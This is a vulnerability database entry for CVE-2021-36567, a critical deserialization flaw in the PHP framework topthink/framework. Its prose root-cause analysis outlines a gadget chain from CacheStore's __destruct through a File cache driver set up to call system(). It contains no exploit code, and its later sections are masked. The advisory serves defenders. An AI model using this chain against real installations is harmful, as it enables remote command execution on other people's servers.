Miggo Logo
Miggo Vulnerability Database
CVE-2021-36567

CVE-2021-36567: Deserialization of Untrusted Data in topthink/framework

9.8

CVSS Score
3.1

Basic Information

CVE ID
CVE-2021-36567
GHSA ID
GHSA-qrvj-274h-hfcg
EPSS Score
0.86807%
CWE
CWE-502
Published
12/7/2021
Updated
2/1/2023
KEV Status
No
Technology
TechnologyPHP

Technical Details

CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Package NameEcosystemVulnerable VersionsFirst Patched Version
topthink/frameworkcomposer<= 6.0.8

Vulnerability Intelligence
Miggo AIMiggo AI

Miggo AIRoot Cause Analysis

The vulnerability arises from deserializing untrusted data (via user-controlled unserialize() calls in application code) that instantiates a CacheStore object. The CacheStore's __destruct method (from AbstractCache) invokes save(), which interacts with a File cache driver configured with attacker-controlled 'serialize' options (e.g., system()). This chain allows arbitrary command execution. The key vulnerable function is the __destruct method in the framework's CacheStore class, which initiates the dangerous deserialization chain.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

T*inkP*P v*.*.* w*s *is*ov*r** to *ont*in * **s*ri*liz*tion vuln*r**ility vi* t** *ompon*nt L***u*\*lysyst*m\******\Stor***\**str**t*****.

Reasoning

T** vuln*r**ility *ris*s *rom **s*ri*lizin* untrust** **t* (vi* us*r-*ontroll** uns*ri*liz*() **lls in *ppli**tion *o**) t**t inst*nti*t*s * *****Stor* o*j**t. T** *****Stor*'s __**stru*t m*t*o* (*rom **str**t*****) invok*s s*v*(), w*i** int*r**ts wi